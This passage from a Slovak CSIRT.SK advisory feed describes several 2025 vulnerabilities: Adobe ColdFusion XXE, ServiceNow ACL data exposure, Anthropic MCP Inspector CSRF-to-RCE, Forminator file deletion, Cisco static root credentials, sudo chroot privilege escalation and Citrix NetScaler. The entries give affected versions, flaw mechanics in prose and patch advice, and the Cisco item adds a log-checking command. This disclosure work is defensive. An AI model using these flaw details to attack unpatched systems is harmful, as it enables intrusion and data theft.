<p>CVE-2025-49533 možno zneužiť podvrhnutím špeciálne vytvorených dát, ktorých deserializácia vedie k <strong>vykonaniu kódu</strong>. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.</p>



<p><strong><u>Adobe ColdFusion:</u></strong></p>



<p><strong>CVE-2025-49535</strong> (CVSS skóre 9,3)</p>



<p>Kritickú zraniteľnosť by vzdialený neautentifikovaný útočník prostredníctvom XXE (XML External Entity) referencie mohol zneužiť na <strong>čítanie obsahu ľubovoľných súborov na súborovom systéme</strong>. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.</p>



<p><strong>CVE-2025-49551</strong> (CVSS skóre 8,8)</p>



<p>Zraniteľnosť spočívajúcu v&nbsp;existencii zabudovaného používateľského konta s&nbsp;predvoleným heslom by útočník nachádzajúci sa v&nbsp;rovnakom sieťovom segmente mohol zneužiť na <strong>získanie neoprávneného prístupu do systému</strong>. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.</p>



<p><strong>CVE-2025-49536, CVE-2025-49537</strong> (CVSS skóre 8,1)</p>



<p>Nesprávnu autorizáciu (CVE-2025-49536) možno zneužiť na <strong>obídenie bezpečnostného prvku</strong>. CVE-2025-49537 spočívajúcu v&nbsp;nesprávnej neutralizácii špeciálnych elementov používaných v&nbsp;rámci príkazov operačného systému by vzdialený autentifikovaný útočník mohol zneužiť na <strong>čítanie obsahu ľubovoľných súborov na súborovom systéme</strong>. Zneužitie zraniteľností nevyžaduje interakciu používateľa.</p>



<p><strong>CVE-2025-49538</strong> (CVSS skóre 7,4)</p>



<p>Blind Xpath XML injekciu by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>čítanie obsahu ľubovoľných súborov na súborovom systéme. </strong>Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.</p>



<p><strong>Pozn.: Ak nie je uvedené inak, zneužitie všetkých vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v&nbsp;časti Zraniteľné systémy alebo&nbsp;na webových stránkach výrobcu uvedených v&nbsp;časti Zdroje. Zároveň odporúčame poučiť používateľov, aby neotvárali správy a&nbsp;prílohy z&nbsp;neznámych a&nbsp;nedôveryhodných zdrojov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/after_effects/apsb25-49.html">https://helpx.adobe.com/security/products/after_effects/apsb25-49.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d-viewer/apsb25-54.html">https://helpx.adobe.com/security/products/substance3d-viewer/apsb25-54.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/audition/apsb25-56.html">https://helpx.adobe.com/security/products/audition/apsb25-56.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/incopy/apsb25-59.html">https://helpx.adobe.com/security/products/incopy/apsb25-59.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/indesign/apsb25-60.html">https://helpx.adobe.com/security/products/indesign/apsb25-60.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/connect/apsb25-61.html">https://helpx.adobe.com/security/products/connect/apsb25-61.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/dimension/apsb25-63.html">https://helpx.adobe.com/security/products/dimension/apsb25-63.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_stager/apsb25-64.html">https://helpx.adobe.com/security/products/substance3d_stager/apsb25-64.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/illustrator/apsb25-65.html">https://helpx.adobe.com/security/products/illustrator/apsb25-65.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/framemaker/apsb25-66.html">https://helpx.adobe.com/security/products/framemaker/apsb25-66.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/aem-forms/apsb25-67.html">https://helpx.adobe.com/security/products/aem-forms/apsb25-67.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/aem-screens/apsb25-68.html">https://helpx.adobe.com/security/products/aem-screens/apsb25-68.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb25-69.html">https://helpx.adobe.com/security/products/coldfusion/apsb25-69.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2548/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v ServiceNow Now Platform možno zneužiť na neoprávnený prístup k údajom</title>
		<link>/posts/2545</link>
					<comments>/posts/2545#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 11 Jul 2025 13:53:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[ServiceNow]]></category>
		<guid isPermaLink="false">/?p=2545</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/servicenow-1024x656.png" alt="" /></p>Spoločnosť ServiceNow vydala bezpečnostné aktualizácie svojej cloudovej manažmentovej platformy Now Platform, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-3648 by neautentifikovaný alebo...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/servicenow-1024x656.png" alt="" /></p>
<p><strong>Spoločnosť ServiceNow vydala bezpečnostné aktualizácie svojej cloudovej manažmentovej platformy Now Platform, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-3648 by neautentifikovaný alebo autentifikovaný útočník mohol zneužiť na získanie prístupu k&nbsp;citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ServiceNow Now PLatform vo verziách starších ako Xanadu a&nbsp;Yokohama</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-3648 </strong>(CVSS skóre 8,2)</p>



<p>Zraniteľnosť, ktorú bezpečnostní výskumníci z Varonis označujú ako <strong>Count(er) Strike</strong>, spočíva v&nbsp;logickej chybe vyhodnocovania ACL (Access Control List) pravidiel a&nbsp;neautentifikovaný aj autentifikovaný útočník by ju prostredníctvom tzv. range query požiadaviek mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>, vrátane prihlasovacích údajov.</p>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť len pri špecifickej konfigurácii ACL pravidiel. Bližšie informácie môžete nájsť v&nbsp;</strong><a href="https://www.varonis.com/blog/counter-strike-servicenow"><strong>analýze výskumníkov z&nbsp;Varonis</strong></a><strong>, ktorí zraniteľnosť objavili.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať aktualizáciu zraniteľných systémov na verzie Xanadu alebo Yokohama, v&nbsp;rámci ktorých boli zavedené nové bezpečnostné funkcie ako Query ACL, Security Data Filters a&nbsp;Deny-Unless ACL a postupovať podľa odporúčaní výrobcu zverejnených v&nbsp;rámci dokumentov <a href="https://support.servicenow.com/kb?id=kb_article_view&amp;sysparm_article=KB2256712">KB2256712</a> a&nbsp;<a href="https://support.servicenow.com/kb?id=kb_article_view&amp;sysparm_article=KB2046494">KB2046494</a>. Uvedené dokumenty sú dostupné len pre prihlásených používateľov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.servicenow.com/kb?id=kb_article_view&amp;sysparm_article=KB2139567">https://support.servicenow.com/kb?id=kb_article_view&amp;sysparm_article=KB2139567</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-3648">https://www.cve.org/CVERecord?id=CVE-2025-3648</a></li>



<li><a href="https://www.varonis.com/blog/counter-strike-servicenow">https://www.varonis.com/blog/counter-strike-servicenow</a></li>



<li><a href="https://thehackernews.com/2025/07/servicenow-flaw-cve-2025-3648-could.html">https://thehackernews.com/2025/07/servicenow-flaw-cve-2025-3648-could.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2545/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritickú zraniteľnosť Anthropic MCP Inspector možno zneužiť na vzdialené vykonanie kódu</title>
		<link>/posts/2531</link>
					<comments>/posts/2531#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 08 Jul 2025 14:06:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Anthropic]]></category>
		<category><![CDATA[MCP Inspector]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2531</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/anthropic-1024x679.jpg" alt="" /></p>Spoločnosť Anthropic vydala bezpečnostné aktualizácie svojho projektu na testovanie a&#160;debugovanie MCP (Model Context Protocol) serverov MCP&#160; Inspector, ktoré opravujú kritickú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/anthropic-1024x679.jpg" alt="" /></p>
<p><strong>Spoločnosť Anthropic vydala bezpečnostné aktualizácie svojho projektu na testovanie a&nbsp;debugovanie MCP (Model Context Protocol) serverov MCP&nbsp; Inspector, ktoré opravujú kritickú zraniteľnosť. CVE-2025-49596 možno zneužiť na vzdialené vykonanie kódu vedúce k&nbsp;úplnému narušeniu dôvernosti, integrity a&nbsp;dostupnosti systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Anthropic MCP Inspector vo verziách starších ako 0.14.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-49596&nbsp; </strong>(CVSS v. 4.0 skóre 9,4)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;chýbajúcej autentifikácii medzi klientom poskytujúcim interaktívne webové rozhranie a proxy serverom prepájajúcim toto rozhranie s&nbsp;rozličnými MCP servermi. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na <strong>realizáciu CSRF útokov (Cross Site Request Forgery)</strong> vedúcich k <strong>vykonaniu MCP príkazov</strong> prostredníctvom stdio. Vykonaním špecifických príkazov možno <strong>získať úplnú kontrolu nad systémom</strong>.</p>



<p>Zneužitie zraniteľnosti na verejne dostupných serveroch MCP Inspector nevyžaduje interakciu používateľa. Zraniteľnosť je však možné zneužiť aj na verejne neprístupných inštanciách, čo vyžaduje, aby obeť otvorila špeciálne vytvorenú webovú stránku zneužívajúcu SSE (Server Sent Events) a staršiu <a href="https://www.csirt.sk/posts/1226.html">zraniteľnosť webových prehliadačov 0.0.0.0 Day</a>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu Anthropic MCP Inspector na verziu 0.14.1 alebo novšiu. V&nbsp;rámci postupov best practice odporúčame MCP servery prevádzkovať izolované od internetu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49596">https://nvd.nist.gov/vuln/detail/CVE-2025-49596</a></li>



<li><a href="https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g">https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g</a></li>



<li><a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596">https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596</a></li>



<li><a href="https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html">https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2531/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v module Forminator možno zneužiť na kompromitáciu WordPress</title>
		<link>/posts/2528</link>
					<comments>/posts/2528#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 08 Jul 2025 14:03:36 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Forminator]]></category>
		<category><![CDATA[Unauthorized change]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=2528</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/forminator.png" alt="" /></p>Vývojári modulu WordPress The Forminator Forms vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-6463 možno zneužiť na odstránenie súborov...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/forminator.png" alt="" /></p>
<p><strong>Vývojári modulu WordPress The Forminator Forms vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-6463 možno zneužiť na odstránenie súborov redakčného systému a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress The Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder vo verzii 1.44.2 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-6463&nbsp; </strong>(CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov vo funkcii <em>save_entry_fields()</em> a súborových ciest v&nbsp;rámci funkcie <em>entry_delete_upload_file()</em>. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>zmazanie ľubovoľných súborov redakčného systému</strong>. Zmazaním špecifických súborov ako napr. <em>wp-config.php</em> možno opätovne inicializovať konfiguráciu webstránky a&nbsp;<strong>získať úplnú kontrolu nad systémom</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu modulu The Forminator Forms na verziu 1.44.3 alebo novšiu. Rovnako odporúčame preveriť integritu súborov redakčného systému WordPress a logy CMS, sieťových a bezpečnostných prvkov na prítomnosť pokusov o zneužitie zraniteľnosti.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/blog/2025/07/600000-wordpress-sites-affected-by-arbitrary-file-deletion-vulnerability-in-forminator-wordpress-plugin/">https://www.wordfence.com/blog/2025/07/600000-wordpress-sites-affected-by-arbitrary-file-deletion-vulnerability-in-forminator-wordpress-plugin/</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-6463">https://www.cve.org/CVERecord?id=CVE-2025-6463</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/forminator-plugin-flaw-exposes-wordpress-sites-to-takeover-attacks/">https://www.bleepingcomputer.com/news/security/forminator-plugin-flaw-exposes-wordpress-sites-to-takeover-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2528/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v Cisco Unified Communications Manager</title>
		<link>/posts/2525</link>
					<comments>/posts/2525#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Jul 2025 13:23:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2525</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Zraniteľnosť v produktoch Cisco Unified Communications Manager (Unified CM) a Cisco Unified Communications Manager Session Management Edition (Unified CM SME)...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Zraniteľnosť v produktoch Cisco Unified Communications Manager (Unified CM) a Cisco Unified Communications Manager Session Management Edition (Unified CM SME) môže umožniť neautentifikovanému vzdialenému útočníkovi prihlásiť sa do napadnutého zariadenia ako používateľ root</strong>.</p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Unified CM verzie 15.0.1.13010 &#8211; 15.0.1.13017-1</li>



<li>Cisco Unified CM SME Engineering Special (ES) verzie 15.0.1.13010 &#8211; 15.0.1.13017-1</li>
</ul>



<p>Cisco ďalej upozorňuje, že zraniteľnosť sa netýka rovnomenných produktov vo verzii 12.5 a 14</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-20309</strong> (CVSS 3.1 skóre 10,0)</p>



<p>Zraniteľnosť umožňuje neoprávnené prihlásenie do účtu <em>root</em> s&nbsp;pôvodnými statickými prihlasovacími údajmi, ktoré nemožno zmeniť ani vymazať. Tieto prihlasovacie údaje boli neúmyselne ponechané v&nbsp;produkčných systémoch z&nbsp;obdobia vývoja aplikácie. Útočník týmto môže získať oprávnenie na spúšťanie ľubovoľných príkazov, prístup k&nbsp;hovorom prebiehajúcich cez zraniteľný softvér a&nbsp;prihlasovacím údajom používateľov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Eskalácia privilégií</strong><strong></strong></li>



<li><strong></strong><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Vzhľadom na kritickosť zraniteľnosti odporúčame bezodkladnú aktualizáciu na verziu 15SU3 alebo aplikovať aktualizačný súbor, dostupný na&nbsp; <a href="https://software.cisco.com/download/home/286331940/type/286319173/release/COP-Files">https://software.cisco.com/download/home/286331940/type/286319173/release/COP-Files</a></p>



<p>Spoločnosť Cisco uvádza, že indikátorom zneužitia môžu byť logy zariadenia obsahujúce výraz <strong>sshd </strong>s <strong>úspešným SSH prihlásením ako užívateľ root</strong>. Na získanie týchto logov možno použiť príkaz:        </p>



<p><code>cucm1# file get activelog syslog/secure</code></p>



<p>Príklad logu kompromitovaného systému:</p>



<p><code>Apr 6 10:38:43 cucm1 authpriv 6 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)<br>Apr 6 10:38:43 cucm1 authpriv 6 <strong>sshd</strong>: pam_unix(sshd:session): session opened for user <strong>root</strong> by (uid=0)</code></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-20309">https://nvd.nist.gov/vuln/detail/CVE-2025-20309</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssh-m4UBdpE7">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssh-m4UBdpE7</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2025-20309/">https://arcticwolf.com/resources/blog/cve-2025-20309/</a></li>



<li><a href="https://thehackernews.com/2025/07/critical-cisco-vulnerability-in-unified.html">https://thehackernews.com/2025/07/critical-cisco-vulnerability-in-unified.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2525/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – jún 2025</title>
		<link>/posts/2521</link>
					<comments>/posts/2521#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 07 Jul 2025 11:34:06 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2521</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci jún 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci jún 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/07/MS202506.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 06/2025 PDF (1 470 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2521/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Sudo</title>
		<link>/posts/2517</link>
					<comments>/posts/2517#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 04 Jul 2025 12:27:41 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[Sudo]]></category>
		<guid isPermaLink="false">/?p=2517</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/linux.png" alt="" /></p>Výskumník z Stratascale Cyber Research Unit objavil kritickú zraniteľnosť v softvérovom balíčku sudo, ktorá neoprávnenému používateľovi umožňuje lokálnu eskaláciu privilégií na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/linux.png" alt="" /></p>
<p><strong>Výskumník z Stratascale Cyber Research Unit objavil kritickú zraniteľnosť v softvérovom balíčku <em>sudo</em>, ktorá neoprávnenému používateľovi umožňuje lokálnu eskaláciu privilégií na Unixových a Unixu-podobným operačných systémov.<br>[Aktualizácia 1.10.2025] Zraniteľnosť <strong>CVE-2025-32463</strong> je aktívne zneužívaná.</strong> </p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>CVE-2025-32462 sudo 1.8.8 – 1.8.32 a 1.9.0 – 1.9.17</p>



<ul>
<li>Oracle Linux 8</li>



<li>RHEL (všetky podporované verzie)</li>



<li>CentOS (všetky podporované verzie)</li>



<li>Alma Linux (všetky podporované verzie)</li>



<li>openSUSE (všetky podporované verzie)</li>



<li>Ubuntu (všetky podporované verzie)</li>



<li>Fedora (všetky podporované verzie)</li>



<li>Debian 10 a všetky podporované verzie</li>



<li>Arch Linux</li>



<li>FreeBSD 13, 14</li>



<li>NetBSD 9.4, 10.1</li>



<li>macOS Sequoia</li>
</ul>



<p>CVE-2025-32463 sudo 1.9.14 – 1.9.17</p>



<ul>
<li>RHEL 10</li>



<li>CentOS 10 Stream</li>



<li>AlmaLinux 10</li>



<li>openSUSE (všetky podporované verzie)</li>



<li>Ubuntu (všetky podporované verzie)</li>



<li>Fedora (všetky podporované verzie)</li>



<li>Debian Sid</li>



<li>Arch Linux</li>



<li>FreeBSD 13, 14</li>



<li>NetBSD 9.4, 10.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-32462 </strong>(CVSS 3.1 skóre 2.8)</p>



<p>Sudo verzie pred 1.9.17p1 pri použití so súborom sudoers, ktorý špecifikuje hostiteľa iného ako je aktuálny &nbsp;alebo <code>ALL</code>, umožňuje používateľom vykonávať neoprávnené príkazy ako <em>root</em>.</p>



<p><strong>CVE-2025-32463 </strong>(CVSS 3.1 skóre 9.3)</p>



<p>Sudo vo verziách pred 1.9.17p1 umožňuje lokálnym používateľom získať oprávnenia používateľa root, pretože pri použití operátora <code>--chroot</code> sa načítava súbor <strong><em>/etc/nsswitch.conf</em></strong> zo súboru špecifikovaného používateľom.<br><strong>[Aktualizácia 1.10.2025] Zraniteľnosť je aktívne zneužívaná.</strong> </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Užívateľom na zraniteľných systémoch odporúčame sledovať aktualizácie od svojho poskytovateľa softvérových balíčkov. Ubuntu, Debian a&nbsp;openSUSE (a ich derivátne distribúcie) už obsahujú aktualizované balíčky verzie 1.9.17p1 a vyššie.</p>



<p>Pre systémy rodiny RHEL zasiahnuté CVE-2025-32462 odporúčame odstránenie všetkých pravidiel definovaných v súbore sudoers, ktoré sú určené pre iné systémy než pre lokálny systém. Pre prostredia používajúce LDAP použite úzko vytýčenú cestu vyhľadávania v konfigurácii SSSD, aby sa do výsledkov dopytu LDAP nezahrnuli pravidlá, ktoré sa na daný systém nevzťahujú.</p>



<p>Zdroje:</p>



<ul>
<li><a href="https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/">https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/</a></li>



<li><a href="https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot">https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-32462">https://nvd.nist.gov/vuln/detail/CVE-2025-32462</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-32463">https://nvd.nist.gov/vuln/detail/CVE-2025-32463</a></li>



<li><a href="https://security-tracker.debian.org/tracker/CVE-2025-32462">https://security-tracker.debian.org/tracker/CVE-2025-32462</a></li>



<li><a href="https://ubuntu.com/security/CVE-2025-32462">https://ubuntu.com/security/CVE-2025-32462</a></li>



<li><a href="https://ubuntu.com/security/CVE-2025-32463">https://ubuntu.com/security/CVE-2025-32463</a></li>



<li><a href="https://access.redhat.com/security/cve/cve-2025-32462">https://access.redhat.com/security/cve/cve-2025-32462</a></li>



<li><a href="https://access.redhat.com/security/cve/cve-2025-32463">https://access.redhat.com/security/cve/cve-2025-32463</a></li>



<li><a href="https://pkgs.org/search/?q=sudo">https://pkgs.org/search/?q=sudo</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2517/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť Citrix NetScaler ADC and NetScaler Gateway</title>
		<link>/posts/2515</link>
					<comments>/posts/2515#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 04 Jul 2025 12:22:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[NetScaler]]></category>
		<guid isPermaLink="false">/?p=2515</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>Spoločnosť Citrix Systems varuje pred kritickou zraniteľnosťou v&#160;zariadeniach NetScaler ADC a NetScaler Gateway, ak sú nakonfigurované ako brána – t....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>
<p><strong>Spoločnosť Citrix Systems varuje pred kritickou zraniteľnosťou v&nbsp;zariadeniach NetScaler ADC a NetScaler Gateway, ak sú nakonfigurované ako brána – t. j. VPN virtuálny server, ICA Proxy, CVPN, RDP Proxy – alebo ako AAA virtuálny server.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>NetScaler ADC a NetScaler Gateway verzie 14.1 pred 14.1-47.46</li>



<li>NetScaler ADC a NetScaler Gateway verzie 13.1 pred 13.1-59.19</li>



<li>NetScaler ADC 13.1-FIPS a NDcPP pred&nbsp; 13.1-37.236-FIPS a&nbsp;NDcPP</li>



<li>Secure Private Access on-prem riešenia využívajúce inštancie NetScaler</li>



<li>Secure Private Access Hybrid riešenia využívajúce inštancie NetScaler</li>
</ul>



<p>Pozn.: NetScaler ADC 12.1 FIPS nie je zasiahnutý touto zraniteľnosťou.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-6543 </strong>(CVSS v4.0 skóre: 9.2)</p>



